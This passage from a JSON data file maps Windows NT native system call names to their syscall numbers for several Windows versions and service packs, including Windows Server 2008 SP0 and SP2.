\"NtQueryEaFile\": \"268\", \"NtQueryFullAttributesFile\": \"269\", \"NtQueryInformationAtom\": \"270\", \"NtQueryInformationEnlistment\": \"271\", \"NtQueryInformationJobObject\": \"272\", \"NtQueryInformationPort\": \"273\", \"NtQueryInformationResourceManager\": \"274\", \"NtQueryInformationTransaction\": \"275\", \"NtQueryInformationTransactionManager\": \"276\", \"NtQueryInformationWorkerFactory\": \"277\", \"NtQueryInstallUILanguage\": \"278\", \"NtQueryIntervalProfile\": \"279\", \"NtQueryIoCompletion\": \"280\", \"NtQueryLicenseValue\": \"281\", \"NtQueryMultipleValueKey\": \"282\", \"NtQueryMutant\": \"283\", \"NtQueryOpenSubKeys\": \"284\", \"NtQueryOpenSubKeysEx\": \"285\", \"NtQueryPortInformationProcess\": \"286\", \"NtQueryQuotaInformationFile\": \"287\", \"NtQuerySecurityObject\": \"288\", \"NtQuerySemaphore\": \"289\", \"NtQuerySymbolicLinkObject\": \"290\", \"NtQuerySystemEnvironmentValue\": \"291\", \"NtQuerySystemEnvironmentValueEx\": \"292\", \"NtQueryTimerResolution\": \"293\", \"NtRaiseException\": \"294\", \"NtRaiseHardError\": \"295\", \"NtReadOnlyEnlistment\": \"296\", \"NtRecoverEnlistment\": \"297\", \"NtRecoverResourceManager\": \"298\", \"NtRecoverTransactionManager\": \"299\", \"NtRegisterProtocolAddressInformation\": \"300\", \"NtRegisterThreadTerminatePort\": \"301\", \"NtReleaseCMFViewOwnership\": \"302\", \"NtReleaseKeyedEvent\": \"303\", \"NtReleaseWorkerFactoryWorker\": \"304\", \"NtRemoveIoCompletionEx\": \"305\", \"NtRemoveProcessDebug\": \"306\", \"NtRenameKey\": \"307\", \"NtRenameTransactionManager\": \"308\", \"NtReplaceKey\": \"309\", \"NtReplacePartitionUnit\": \"310\", \"NtReplyWaitReplyPort\": \"311\", \"NtRequestDeviceWakeup\": \"312\", \"NtRequestPort\": \"313\", \"NtRequestWakeupLatency\": \"314\", \"NtResetEvent\": \"315\", \"NtResetWriteWatch\": \"316\", \"NtRestoreKey\": \"317\", \"NtResumeProcess\": \"318\", \"NtRollbackComplete\": \"319\", \"NtRollbackEnlistment\": \"320\", \"NtRollbackTransaction\": \"321\", \"NtRollforwardTransactionManager\": \"322\", \"NtSaveKey\": \"323\", \"NtSaveKeyEx\": \"324\", \"NtSaveMergedKeys\": \"325\", \"NtSecureConnectPort\": \"326\", \"NtSetBootEntryOrder\": \"327\", \"NtSetBootOptions\": \"328\", \"NtSetContextThread\": \"329\", \"NtSetDebugFilterState\": \"330\", \"NtSetDefaultHardErrorPort\": \"331\", \"NtSetDefaultLocale\": \"332\", \"NtSetDefaultUILanguage\": \"333\", \"NtSetDriverEntryOrder\": \"334\", \"NtSetEaFile\": \"335\", \"NtSetHighEventPair\": \"336\", \"NtSetHighWaitLowEventPair\": \"337\", \"NtSetInformationDebugObject\": \"338\", \"NtSetInformationEnlistment\": \"339\", \"NtSetInformationJobObject\": \"340\", \"NtSetInformationKey\": \"341\", \"NtSetInformationResourceManager\": \"342\", \"NtSetInformationToken\": \"343\", \"NtSetInformationTransaction\": \"344\", \"NtSetInformationTransactionManager\": \"345\", \"NtSetInformationWorkerFactory\": \"346\", \"NtSetIntervalProfile\": \"347\", \"NtSetIoCompletion\": \"348\", \"NtSetLdtEntries\": \"349\", \"NtSetLowEventPair\": \"350\", \"NtSetLowWaitHighEventPair\": \"351\", \"NtSetQuotaInformationFile\": \"352\", \"NtSetSecurityObject\": \"353\", \"NtSetSystemEnvironmentValue\": \"354\", \"NtSetSystemEnvironmentValueEx\": \"355\", \"NtSetSystemInformation\": \"356\", \"NtSetSystemPowerState\": \"357\", \"NtSetSystemTime\": \"358\", \"NtSetThreadExecutionState\": \"359\", \"NtSetTimerResolution\": \"360\", \"NtSetUuidSeed\": \"361\", \"NtSetVolumeInformationFile\": \"362\", \"NtShutdownSystem\": \"363\", \"NtShutdownWorkerFactory\": \"364\", \"NtSignalAndWaitForSingleObject\": \"365\", \"NtSinglePhaseReject\": \"366\", \"NtStartProfile\": \"367\", \"NtStopProfile\": \"368\", \"NtSuspendProcess\": \"369\", \"NtSuspendThread\": \"370\", \"NtSystemDebugControl\": \"371\", \"NtTerminateJobObject\": \"372\", \"NtTestAlert\": \"373\", \"NtThawRegistry\": \"374\", \"NtThawTransactions\": \"375\", \"NtTraceControl\": \"376\", \"NtTranslateFilePath\": \"377\", \"NtUnloadDriver\": \"378\", \"NtUnloadKey\": \"379\", \"NtUnloadKey2\": \"380\", \"NtUnloadKeyEx\": \"381\", \"NtUnlockFile\": \"382\", \"NtUnlockVirtualMemory\": \"383\", \"NtVdmControl\": \"384\", \"NtWaitForDebugEvent\": \"385\", \"NtWaitForKeyedEvent\": \"386\", \"NtWaitForWorkViaWorkerFactory\": \"387\", \"NtWaitHighEventPair\": \"388\", \"NtWaitLowEventPair\": \"389\", \"NtWorkerFactoryWorkerReady\": \"390\"}}, \"Windows Server 2008\": {\"SP0\": {\"NtMapUserPhysicalPagesScatter\": \"0\", \"NtWaitForSingleObject\": \"1\", \"NtCallbackReturn\": \"2\", \"NtReadFile\": \"3\", \"NtDeviceIoControlFile\": \"4\", \"NtWriteFile\": \"5\", \"NtRemoveIoCompletion\": \"6\", \"NtReleaseSemaphore\": \"7\", \"NtReplyWaitReceivePort\": \"8\", \"NtReplyPort\": \"9\", \"NtSetInformationThread\": \"10\", \"NtSetEvent\": \"11\", \"NtClose\": \"12\", \"NtQueryObject\": \"13\", \"NtQueryInformationFile\": \"14\", \"NtOpenKey\": \"15\", \"NtEnumerateValueKey\": \"16\", \"NtFindAtom\": \"17\", \"NtQueryDefaultLocale\": \"18\", \"NtQueryKey\": \"19\", \"NtQueryValueKey\": \"20\", \"NtAllocateVirtualMemory\": \"21\", \"NtQueryInformationProcess\": \"22\", \"NtWaitForMultipleObjects32\": \"23\", \"NtWriteFileGather\": \"24\", \"NtSetInformationProcess\": \"25\", \"NtCreateKey\": \"26\", \"NtFreeVirtualMemory\": \"27\", \"NtImpersonateClientOfPort\": \"28\", \"NtReleaseMutant\": \"29\", \"NtQueryInformationToken\": \"30\", \"NtRequestWaitReplyPort\": \"31\", \"NtQueryVirtualMemory\": \"32\", \"NtOpenThreadToken\": \"33\", \"NtQueryInformationThread\": \"34\", \"NtOpenProcess\": \"35\", \"NtSetInformationFile\": \"36\", \"NtMapViewOfSection\": \"37\", \"NtAccessCheckAndAuditAlarm\": \"38\", \"NtUnmapViewOfSection\": \"39\", \"NtReplyWaitReceivePortEx\": \"40\", \"NtTerminateProcess\": \"41\", \"NtSetEventBoostPriority\": \"42\", \"NtReadFileScatter\": \"43\", \"NtOpenThreadTokenEx\": \"44\", \"NtOpenProcessTokenEx\": \"45\", \"NtQueryPerformanceCounter\": \"46\", \"NtEnumerateKey\": \"47\", \"NtOpenFile\": \"48\", \"NtDelayExecution\": \"49\", \"NtQueryDirectoryFile\": \"50\", \"NtQuerySystemInformation\": \"51\", \"NtOpenSection\": \"52\", \"NtQueryTimer\": \"53\", \"NtFsControlFile\": \"54\", \"NtWriteVirtualMemory\": \"55\", \"NtCloseObjectAuditAlarm\": \"56\", \"NtDuplicateObject\": \"57\", \"NtQueryAttributesFile\": \"58\", \"NtClearEvent\": \"59\", \"NtReadVirtualMemory\": \"60\", \"NtOpenEvent\": \"61\", \"NtAdjustPrivilegesToken\": \"62\", \"NtDuplicateToken\": \"63\", \"NtContinue\": \"64\", \"NtQueryDefaultUILanguage\": \"65\", \"NtQueueApcThread\": \"66\", \"NtYieldExecution\": \"67\", \"NtAddAtom\": \"68\", \"NtCreateEvent\": \"69\", \"NtQueryVolumeInformationFile\": \"70\", \"NtCreateSection\": \"71\", \"NtFlushBuffersFile\": \"72\", \"NtApphelpCacheControl\": \"73\", \"NtCreateProcessEx\": \"74\", \"NtCreateThread\": \"75\", \"NtIsProcessInJob\": \"76\", \"NtProtectVirtualMemory\": \"77\", \"NtQuerySection\": \"78\", \"NtResumeThread\": \"79\", \"NtTerminateThread\": \"80\", \"NtReadRequestData\": \"81\", \"NtCreateFile\": \"82\", \"NtQueryEvent\": \"83\", \"NtWriteRequestData\": \"84\", \"NtOpenDirectoryObject\": \"85\", \"NtAccessCheckByTypeAndAuditAlarm\": \"86\", \"NtQuerySystemTime\": \"87\", \"NtWaitForMultipleObjects\": \"88\", \"NtSetInformationObject\": \"89\", \"NtCancelIoFile\": \"90\", \"NtTraceEvent\": \"91\", \"NtPowerInformation\": \"92\", \"NtSetValueKey\": \"93\", \"NtCancelTimer\": \"94\", \"NtSetTimer\": \"95\", \"NtAcceptConnectPort\": \"96\", \"NtAccessCheck\": \"97\", \"NtAccessCheckByType\": \"98\", \"NtAccessCheckByTypeResultList\": \"99\", \"NtAccessCheckByTypeResultListAndAuditAlarm\": \"100\", \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": \"101\", \"NtAcquireCMFViewOwnership\": \"102\", \"NtAddBootEntry\": \"103\", \"NtAddDriverEntry\": \"104\", \"NtAdjustGroupsToken\": \"105\", \"NtAlertResumeThread\": \"106\", \"NtAlertThread\": \"107\", \"NtAllocateLocallyUniqueId\": \"108\", \"NtAllocateUserPhysicalPages\": \"109\", \"NtAllocateUuids\": \"110\", \"NtAlpcAcceptConnectPort\": \"111\", \"NtAlpcCancelMessage\": \"112\", \"NtAlpcConnectPort\": \"113\", \"NtAlpcCreatePort\": \"114\", \"NtAlpcCreatePortSection\": \"115\", \"NtAlpcCreateResourceReserve\": \"116\", \"NtAlpcCreateSectionView\": \"117\", \"NtAlpcCreateSecurityContext\": \"118\", \"NtAlpcDeletePortSection\": \"119\", \"NtAlpcDeleteResourceReserve\": \"120\", \"NtAlpcDeleteSectionView\": \"121\", \"NtAlpcDeleteSecurityContext\": \"122\", \"NtAlpcDisconnectPort\": \"123\", \"NtAlpcImpersonateClientOfPort\": \"124\", \"NtAlpcOpenSenderProcess\": \"125\", \"NtAlpcOpenSenderThread\": \"126\", \"NtAlpcQueryInformation\": \"127\", \"NtAlpcQueryInformationMessage\": \"128\", \"NtAlpcRevokeSecurityContext\": \"129\", \"NtAlpcSendWaitReceivePort\": \"130\", \"NtAlpcSetInformation\": \"131\", \"NtAreMappedFilesTheSame\": \"132\", \"NtAssignProcessToJobObject\": \"133\", \"NtRequestDeviceWakeup\": \"134\", \"NtCancelIoFileEx\": \"135\", \"NtCancelSynchronousIoFile\": \"136\", \"NtCommitComplete\": \"137\", \"NtCommitEnlistment\": \"138\", \"NtCommitTransaction\": \"139\", \"NtCompactKeys\": \"140\", \"NtCompareTokens\": \"141\", \"NtCompleteConnectPort\": \"142\", \"NtCompressKey\": \"143\", \"NtConnectPort\": \"144\", \"NtCreateDebugObject\": \"145\", \"NtCreateDirectoryObject\": \"146\", \"NtCreateEnlistment\": \"147\", \"NtCreateEventPair\": \"148\", \"NtCreateIoCompletion\": \"149\", \"NtCreateJobObject\": \"150\", \"NtCreateJobSet\": \"151\", \"NtCreateKeyTransacted\": \"152\", \"NtCreateKeyedEvent\": \"153\", \"NtCreateMailslotFile\": \"154\", \"NtCreateMutant\": \"155\", \"NtCreateNamedPipeFile\": \"156\", \"NtCreatePagingFile\": \"157\", \"NtCreatePort\": \"158\", \"NtCreatePrivateNamespace\": \"159\", \"NtCreateProcess\": \"160\", \"NtCreateProfile\": \"161\", \"NtCreateResourceManager\": \"162\", \"NtCreateSemaphore\": \"163\", \"NtCreateSymbolicLinkObject\": \"164\", \"NtCreateThreadEx\": \"165\", \"NtCreateTimer\": \"166\", \"NtCreateToken\": \"167\", \"NtCreateTransaction\": \"168\", \"NtCreateTransactionManager\": \"169\", \"NtCreateUserProcess\": \"170\", \"NtCreateWaitablePort\": \"171\", \"NtCreateWorkerFactory\": \"172\", \"NtDebugActiveProcess\": \"173\", \"NtDebugContinue\": \"174\", \"NtDeleteAtom\": \"175\", \"NtDeleteBootEntry\": \"176\", \"NtDeleteDriverEntry\": \"177\", \"NtDeleteFile\": \"178\", \"NtDeleteKey\": \"179\", \"NtDeleteObjectAuditAlarm\": \"180\", \"NtDeletePrivateNamespace\": \"181\", \"NtDeleteValueKey\": \"182\", \"NtDisplayString\": \"183\", \"NtEnumerateBootEntries\": \"184\", \"NtEnumerateDriverEntries\": \"185\", \"NtEnumerateSystemEnvironmentValuesEx\": \"186\", \"NtEnumerateTransactionObject\": \"187\", \"NtExtendSection\": \"188\", \"NtFilterToken\": \"189\", \"NtFlushInstallUILanguage\": \"190\", \"NtFlushInstructionCache\": \"191\", \"NtFlushKey\": \"192\", \"NtFlushProcessWriteBuffers\": \"193\", \"NtFlushVirtualMemory\": \"194\", \"NtFlushWriteBuffer\": \"195\", \"NtFreeUserPhysicalPages\": \"196\", \"NtFreezeRegistry\": \"197\", \"NtFreezeTransactions\": \"198\", \"NtGetContextThread\": \"199\", \"NtGetCurrentProcessorNumber\": \"200\", \"NtGetDevicePowerState\": \"201\", \"NtGetMUIRegistryInfo\": \"202\", \"NtGetNextProcess\": \"203\", \"NtGetNextThread\": \"204\", \"NtGetNlsSectionPtr\": \"205\", \"NtGetNotificationResourceManager\": \"206\", \"NtGetPlugPlayEvent\": \"207\", \"NtGetWriteWatch\": \"208\", \"NtImpersonateAnonymousToken\": \"209\", \"NtImpersonateThread\": \"210\", \"NtInitializeNlsFiles\": \"211\", \"NtInitializeRegistry\": \"212\", \"NtInitiatePowerAction\": \"213\", \"NtIsSystemResumeAutomatic\": \"214\", \"NtIsUILanguageComitted\": \"215\", \"NtListenPort\": \"216\", \"NtLoadDriver\": \"217\", \"NtLoadKey\": \"218\", \"NtLoadKey2\": \"219\", \"NtLoadKeyEx\": \"220\", \"NtLockFile\": \"221\", \"NtLockProductActivationKeys\": \"222\", \"NtLockRegistryKey\": \"223\", \"NtLockVirtualMemory\": \"224\", \"NtMakePermanentObject\": \"225\", \"NtMakeTemporaryObject\": \"226\", \"NtMapCMFModule\": \"227\", \"NtMapUserPhysicalPages\": \"228\", \"NtModifyBootEntry\": \"229\", \"NtModifyDriverEntry\": \"230\", \"NtNotifyChangeDirectoryFile\": \"231\", \"NtNotifyChangeKey\": \"232\", \"NtNotifyChangeMultipleKeys\": \"233\", \"NtOpenEnlistment\": \"234\", \"NtOpenEventPair\": \"235\", \"NtOpenIoCompletion\": \"236\", \"NtOpenJobObject\": \"237\", \"NtOpenKeyTransacted\": \"238\", \"NtOpenKeyedEvent\": \"239\", \"NtOpenMutant\": \"240\", \"NtOpenObjectAuditAlarm\": \"241\", \"NtOpenPrivateNamespace\": \"242\", \"NtOpenProcessToken\": \"243\", \"NtOpenResourceManager\": \"244\", \"NtOpenSemaphore\": \"245\", \"NtOpenSession\": \"246\", \"NtOpenSymbolicLinkObject\": \"247\", \"NtOpenThread\": \"248\", \"NtOpenTimer\": \"249\", \"NtOpenTransaction\": \"250\", \"NtOpenTransactionManager\": \"251\", \"NtPlugPlayControl\": \"252\", \"NtPrePrepareComplete\": \"253\", \"NtPrePrepareEnlistment\": \"254\", \"NtPrepareComplete\": \"255\", \"NtPrepareEnlistment\": \"256\", \"NtPrivilegeCheck\": \"257\", \"NtPrivilegeObjectAuditAlarm\": \"258\", \"NtPrivilegedServiceAuditAlarm\": \"259\", \"NtPropagationComplete\": \"260\", \"NtPropagationFailed\": \"261\", \"NtPulseEvent\": \"262\", \"NtQueryBootEntryOrder\": \"263\", \"NtQueryBootOptions\": \"264\", \"NtQueryDebugFilterState\": \"265\", \"NtQueryDirectoryObject\": \"266\", \"NtQueryDriverEntryOrder\": \"267\", \"NtQueryEaFile\": \"268\", \"NtQueryFullAttributesFile\": \"269\", \"NtQueryInformationAtom\": \"270\", \"NtQueryInformationEnlistment\": \"271\", \"NtQueryInformationJobObject\": \"272\", \"NtQueryInformationPort\": \"273\", \"NtQueryInformationResourceManager\": \"274\", \"NtQueryInformationTransaction\": \"275\", \"NtQueryInformationTransactionManager\": \"276\", \"NtQueryInformationWorkerFactory\": \"277\", \"NtQueryInstallUILanguage\": \"278\", \"NtQueryIntervalProfile\": \"279\", \"NtQueryIoCompletion\": \"280\", \"NtQueryLicenseValue\": \"281\", \"NtQueryMultipleValueKey\": \"282\", \"NtQueryMutant\": \"283\", \"NtQueryOpenSubKeys\": \"284\", \"NtQueryOpenSubKeysEx\": \"285\", \"NtQueryPortInformationProcess\": \"286\", \"NtQueryQuotaInformationFile\": \"287\", \"NtQuerySecurityObject\": \"288\", \"NtQuerySemaphore\": \"289\", \"NtQuerySymbolicLinkObject\": \"290\", \"NtQuerySystemEnvironmentValue\": \"291\", \"NtQuerySystemEnvironmentValueEx\": \"292\", \"NtQueryTimerResolution\": \"293\", \"NtRaiseException\": \"294\", \"NtRaiseHardError\": \"295\", \"NtReadOnlyEnlistment\": \"296\", \"NtRecoverEnlistment\": \"297\", \"NtRecoverResourceManager\": \"298\", \"NtRecoverTransactionManager\": \"299\", \"NtRegisterProtocolAddressInformation\": \"300\", \"NtRegisterThreadTerminatePort\": \"301\", \"NtReleaseCMFViewOwnership\": \"302\", \"NtReleaseKeyedEvent\": \"303\", \"NtReleaseWorkerFactoryWorker\": \"304\", \"NtRemoveIoCompletionEx\": \"305\", \"NtRemoveProcessDebug\": \"306\", \"NtRenameKey\": \"307\", \"NtRenameTransactionManager\": \"308\", \"NtReplaceKey\": \"309\", \"NtReplacePartitionUnit\": \"310\", \"NtReplyWaitReplyPort\": \"311\", \"NtCancelDeviceWakeupRequest\": \"312\", \"NtRequestPort\": \"313\", \"NtRequestWakeupLatency\": \"314\", \"NtResetEvent\": \"315\", \"NtResetWriteWatch\": \"316\", \"NtRestoreKey\": \"317\", \"NtResumeProcess\": \"318\", \"NtRollbackComplete\": \"319\", \"NtRollbackEnlistment\": \"320\", \"NtRollbackTransaction\": \"321\", \"NtRollforwardTransactionManager\": \"322\", \"NtSaveKey\": \"323\", \"NtSaveKeyEx\": \"324\", \"NtSaveMergedKeys\": \"325\", \"NtSecureConnectPort\": \"326\", \"NtSetBootEntryOrder\": \"327\", \"NtSetBootOptions\": \"328\", \"NtSetContextThread\": \"329\", \"NtSetDebugFilterState\": \"330\", \"NtSetDefaultHardErrorPort\": \"331\", \"NtSetDefaultLocale\": \"332\", \"NtSetDefaultUILanguage\": \"333\", \"NtSetDriverEntryOrder\": \"334\", \"NtSetEaFile\": \"335\", \"NtSetHighEventPair\": \"336\", \"NtSetHighWaitLowEventPair\": \"337\", \"NtSetInformationDebugObject\": \"338\", \"NtSetInformationEnlistment\": \"339\", \"NtSetInformationJobObject\": \"340\", \"NtSetInformationKey\": \"341\", \"NtSetInformationResourceManager\": \"342\", \"NtSetInformationToken\": \"343\", \"NtSetInformationTransaction\": \"344\", \"NtSetInformationTransactionManager\": \"345\", \"NtSetInformationWorkerFactory\": \"346\", \"NtSetIntervalProfile\": \"347\", \"NtSetIoCompletion\": \"348\", \"NtSetLdtEntries\": \"349\", \"NtSetLowEventPair\": \"350\", \"NtSetLowWaitHighEventPair\": \"351\", \"NtSetQuotaInformationFile\": \"352\", \"NtSetSecurityObject\": \"353\", \"NtSetSystemEnvironmentValue\": \"354\", \"NtSetSystemEnvironmentValueEx\": \"355\", \"NtSetSystemInformation\": \"356\", \"NtSetSystemPowerState\": \"357\", \"NtSetSystemTime\": \"358\", \"NtSetThreadExecutionState\": \"359\", \"NtSetTimerResolution\": \"360\", \"NtSetUuidSeed\": \"361\", \"NtSetVolumeInformationFile\": \"362\", \"NtShutdownSystem\": \"363\", \"NtShutdownWorkerFactory\": \"364\", \"NtSignalAndWaitForSingleObject\": \"365\", \"NtSinglePhaseReject\": \"366\", \"NtStartProfile\": \"367\", \"NtStopProfile\": \"368\", \"NtSuspendProcess\": \"369\", \"NtSuspendThread\": \"370\", \"NtSystemDebugControl\": \"371\", \"NtTerminateJobObject\": \"372\", \"NtTestAlert\": \"373\", \"NtThawRegistry\": \"374\", \"NtThawTransactions\": \"375\", \"NtTraceControl\": \"376\", \"NtTranslateFilePath\": \"377\", \"NtUnloadDriver\": \"378\", \"NtUnloadKey\": \"379\", \"NtUnloadKey2\": \"380\", \"NtUnloadKeyEx\": \"381\", \"NtUnlockFile\": \"382\", \"NtUnlockVirtualMemory\": \"383\", \"NtVdmControl\": \"384\", \"NtWaitForDebugEvent\": \"385\", \"NtWaitForKeyedEvent\": \"386\", \"NtWaitForWorkViaWorkerFactory\": \"387\", \"NtWaitHighEventPair\": \"388\", \"NtWaitLowEventPair\": \"389\", \"NtWorkerFactoryWorkerReady\": \"390\"}, \"SP2\": {\"NtMapUserPhysicalPagesScatter\": \"0\", \"NtWaitForSingleObject\": \"1\", \"NtCallbackReturn\": \"2\", \"NtReadFile\": \"3\", \"NtDeviceIoControlFile\": \"4\", \"NtWriteFile\": \"5\", \"NtRemoveIoCompletion\": \"6\", \"NtReleaseSemaphore\": \"7\", \"NtReplyWaitReceivePort\": \"8\", \"NtReplyPort\": \"9\", \"NtSetInformationThread\": \"10\", \"NtSetEvent\": \"11\", \"NtClose\": \"12\", \"NtQueryObject\": \"13\", \"NtQueryInformationFile\": \"14\", \"NtOpenKey\": \"15\", \"NtEnumerateValueKey\": \"16\", \"NtFindAtom\": \"17\", \"NtQueryDefaultLocale\": \"18\", \"NtQueryKey\": \"19\", \"NtQueryValueKey\": \"20\", \"NtAllocateVirtualMemory\": \"21\", \"NtQueryInformationProcess\": \"22\", \"NtWaitForMultipleObjects32\": \"23\", \"NtWriteFileGather\": \"24\", \"NtSetInformationProcess\": \"25\", \"NtCreateKey\": \"26\", \"NtFreeVirtualMemory\": \"27\", \"NtImpersonateClientOfPort\": \"28\", \"NtReleaseMutant\": \"29\", \"NtQueryInformationToken\": \"30\", \"NtRequestWaitReplyPort\": \"31\", \"NtQueryVirtualMemory\": \"32\", \"NtOpenThreadToken\": \"33\", \"NtQueryInformationThread\": \"34\", \"NtOpenProcess\": \"35\", \"NtSetInformationFile\": \"36\", \"NtMapViewOfSection\": \"37\", \"NtAccessCheckAndAuditAlarm\": \"38\", \"NtUnmapViewOfSection\": \"39\", \"NtReplyWaitReceivePortEx\": \"40\", \"NtTerminateProcess\": \"41\", \"NtSetEventBoostPriority\": \"42\", \"NtReadFileScatter\": \"43\", \"NtOpenThreadTokenEx\": \"44\", \"NtOpenProcessTokenEx\": \"45\", \"NtQueryPerformanceCounter\": \"46\", \"NtEnumerateKey\": \"47\", \"NtOpenFile\": \"48\", \"NtDelayExecution\": \"49\", \"NtQueryDirectoryFile\": \"50\", \"NtQuerySystemInformation\": \"51\", \"NtOpenSection\": \"52\", \"NtQueryTimer\": \"53\", \"NtFsControlFile\": \"54\", \"NtWriteVirtualMemory\": \"55\", \"NtCloseObjectAuditAlarm\": \"56\", \"NtDuplicateObject\": \"57\", \"NtQueryAttributesFile\": \"58\", \"NtClearEvent\": \"59\", \"NtReadVirtualMemory\": \"60\", \"NtOpenEvent\": \"61\", \"NtAdjustPrivilegesToken\": \"62\", \"NtDuplicateToken\": \"63\", \"NtContinue\": \"64\", \"NtQueryDefaultUILanguage\": \"65\", \"NtQueueApcThread\": \"66\", \"NtYieldExecution\": \"67\", \"NtAddAtom\": \"68\", \"NtCreateEvent\": \"69\", \"NtQueryVolumeInformationFile\": \"70\", \"NtCreateSection\": \"71\", \"NtFlushBuffersFile\": \"72\", \"NtApphelpCacheControl\": \"73\", \"NtCreateProcessEx\": \"74\", \"NtCreateThread\": \"75\", \"NtIsProcessInJob\": \"76\", \"NtProtectVirtualMemory\": \"77\", \"NtQuerySection\": \"78\", \"NtResumeThread\": \"79\", \"NtTerminateThread\": \"80\", \"NtReadRequestData\": \"81\", \"NtCreateFile\": \"82\", \"NtQueryEvent\": \"83\", \"NtWriteRequestData\": \"84\", \"NtOpenDirectoryObject\": \"85\", \"NtAccessCheckByTypeAndAuditAlarm\": \"86\", \"NtQuerySystemTime\": \"87\", \"NtWaitForMultipleObjects\": \"88\", \"NtSetInformationObject\": \"89\", \"NtCancelIoFile\": \"90\", \"NtTraceEvent\": \"91\", \"NtPowerInformation\": \"92\", \"NtSetValueKey\": \"93\", \"NtCancelTimer\": \"94\", \"NtSetTimer\": \"95\", \"NtAcceptConnectPort\": \"96\", \"NtAccessCheck\": \"97\", \"NtAccessCheckByType\": \"98\", \"NtAccessCheckByTypeResultList\": \"99\", \"NtAccessCheckByTypeResultListAndAuditAlarm\": \"100\", \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": \"101\", \"NtAcquireCMFViewOwnership\": \"102\", \"NtAddBootEntry\": \"103\", \"NtAddDriverEntry\": \"104\", \"NtAdjustGroupsToken\": \"105\", \"NtAlertResumeThread\": \"106\", \"NtAlertThread\": \"107\", \"NtAllocateLocallyUniqueId\": \"108\", \"NtAllocateUserPhysicalPages\": \"109\", \"NtAllocateUuids\": \"110\", \"NtAlpcAcceptConnectPort\": \"111\", \"NtAlpcCancelMessage\": \"112\", \"NtAlpcConnectPort\": \"113\", \"NtAlpcCreatePort\": \"114\", \"NtAlpcCreatePortSection\": \"115\", \"NtAlpcCreateResourceReserve\": \"116\", \"NtAlpcCreateSectionView\": \"117\", \"NtAlpcCreateSecurityContext\": \"118\", \"NtAlpcDeletePortSection\": \"119\", \"NtAlpcDeleteResourceReserve\": \"120\", \"NtAlpcDeleteSectionView\": \"121\", \"NtAlpcDeleteSecurityContext\": \"122\", \"NtAlpcDisconnectPort\": \"123\", \"NtAlpcImpersonateClientOfPort\": \"124\", \"NtAlpcOpenSenderProcess\": \"125\", \"NtAlpcOpenSenderThread\": \"126\", \"NtAlpcQueryInformation\": \"127\", \"NtAlpcQueryInformationMessage\": \"128\", \"NtAlpcRevokeSecurityContext\": \"129\", \"NtAlpcSendWaitReceivePort\": \"130\", \"NtAlpcSetInformation\": \"131\", \"NtAreMappedFilesTheSame\": \"132\", \"NtAssignProcessToJobObject\": \"133\", \"NtCancelDeviceWakeupRequest\": \"134\", \"NtCancelIoFileEx\": \"135\", \"NtCancelSynchronousIoFile\": \"136\", \"NtCommitComplete\": \"137\", \"NtCommitEnlistment\": \"138\", \"NtCommitTransaction\": \"139\", \"NtCompactKeys\": \"140\", \"NtCompareTokens\": \"141\", \"NtCompleteConnectPort\": \"142\", \"NtCompressKey\": \"143\", \"NtConnectPort\": \"144\", \"NtCreateDebugObject\": \"145\", \"NtCreateDirectoryObject\": \"146\", \"NtCreateEnlistment\": \"147\", \"NtCreateEventPair\": \"148\", \"NtCreateIoCompletion\": \"149\", \"NtCreateJobObject\": \"150\", \"NtCreateJobSet\": \"151\", \"NtCreateKeyTransacted\": \"152\", \"NtCreateKeyedEvent\": \"153\", \"NtCreateMailslotFile\": \"154\", \"NtCreateMutant\": \"155\", \"NtCreateNamedPipeFile\": \"156\", \"NtCreatePagingFile\": \"157\", \"NtCreatePort\": \"158\", \"NtCreatePrivateNamespace\": \"159\", \"NtCreateProcess\": \"160\", \"NtCreateProfile\": \"161\", \"NtCreateResourceManager\": \"162\", \"NtCreateSemaphore\": \"163\", \"NtCreateSymbolicLinkObject\": \"164\", \"NtCreateThreadEx\": \"165\", \"NtCreateTimer\": \"166\", \"NtCreateToken\": \"167\", \"NtCreateTransaction\": \"168\", \"NtCreateTransactionManager\": \"169\", \"NtCreateUserProcess\": \"170\", \"NtCreateWaitablePort\": \"171\", \"NtCreateWorkerFactory\": \"172\", \"NtDebugActiveProcess\": \"173\", \"NtDebugContinue\": \"174\", \"NtDeleteAtom\": \"175\", \"NtDeleteBootEntry\": \"176\", \"NtDeleteDriverEntry\": \"177\", \"NtDeleteFile\": \"178\", \"NtDeleteKey\": \"179\", \"NtDeleteObjectAuditAlarm\": \"180\", \"NtDeletePrivateNamespace\": \"181\", \"NtDeleteValueKey\": \"182\", \"NtDisplayString\": \"183\", \"NtEnumerateBootEntries\": \"184\", \"NtEnumerateDriverEntries\": \"185\", \"NtEnumerateSystemEnvironmentValuesEx\": \"186\", \"NtEnumerateTransactionObject\": \"187\", \"NtExtendSection\": \"188\", \"NtFilterToken\": \"189\", \"NtFlushInstallUILanguage\": \"190\", \"NtFlushInstructionCache\": \"191\", \"NtFlushKey\": \"192\", \"NtFlushProcessWriteBuffers\": \"193\", \"NtFlushVirtualMemory\": \"194\", \"NtFlushWriteBuffer\": \"195\", \"NtFreeUserPhysicalPages\": \"196\", \"NtFreezeRegistry\": \"197\", \"NtFreezeTransactions\": \"198\", \"NtGetContextThread\": \"199\", \"NtGetCurrentProcessorNumber\": \"200\", \"NtGetDevicePowerState\": \"201\", \"NtGetMUIRegistryInfo\": \"202\", \"NtGetNextProcess\": \"203\", \"NtGetNextThread\": \"204\", \"NtGetNlsSectionPtr\": \"205\", \"NtGetNotificationResourceManager\": \"206\", \"NtGetPlugPlayEvent\": \"207\", \"NtGetWriteWatch\": \"208\", \"NtImpersonateAnonymousToken\": \"209\", \"NtImpersonateThread\": \"210\", \"NtInitializeNlsFiles\": \"211\", \"NtInitializeRegistry\": \"212\", \"NtInitiatePowerAction\": \"213\", \"NtIsSystemResumeAutomatic\": \"214\", \"NtIsUILanguageComitted\": \"215\", \"NtListenPort\": \"216\", \"NtLoadDriver\": \"217\", \"NtLoadKey\": \"218\", \"NtLoadKey2\": \"219\", \"NtLoadKeyEx\": \"220\", \"NtLockFile\": \"221\", \"NtLockProductActivationKeys\": \"222\", \"NtLockRegistryKey\": \"223\", \"NtLockVirtualMemory\": \"224\", \"NtMakePermanentObject\": \"225\", \"NtMakeTemporaryObject\": \"226\", \"NtMapCMFModule\": \"227\", \"NtMapUserPhysicalPages\": \"228\", \"NtModifyBootEntry\": \"229\", \"NtModifyDriverEntry\": \"230\", \"NtNotifyChangeDirectoryFile\": \"231\", \"NtNotifyChangeKey\": \"232\", \"NtNotifyChangeMultipleKeys\": \"233\", 